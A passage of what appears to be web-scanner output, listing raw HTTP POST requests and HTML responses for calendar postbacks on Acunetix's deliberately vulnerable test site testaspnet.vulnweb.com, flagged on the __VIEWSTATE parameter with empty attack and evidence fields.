Request Body - size: 1,097 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8406&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDASvR479oIZGRkFDlPgi6FqDJovTXGGYRkjhBRwkI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKrmtCUBgL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gVNbdb%2B6knxrKgOsLLYreivZFQY9A%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:13:09 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDASvR479oIZGRkFDlPgi6FqDJovTXGGYRkjhBRwkI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKrmtCUBgL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gVNbdb+6knxrKgOsLLYreivZFQY9A==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:White" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1095 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,095 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8394&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDAVfcK5toIZGRkS0f6n0ZSgvj2o6zxLrelUn9xIqA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKjutjcCgL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gWULwtCEZg8NSvKVgB3nkL4A0iiTw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:44:52 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDAVfcK5toIZGRkS0f6n0ZSgvj2o6zxLrelUn9xIqA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKjutjcCgL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gWULwtCEZg8NSvKVgB3nkL4A0iiTw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:White" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1131 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
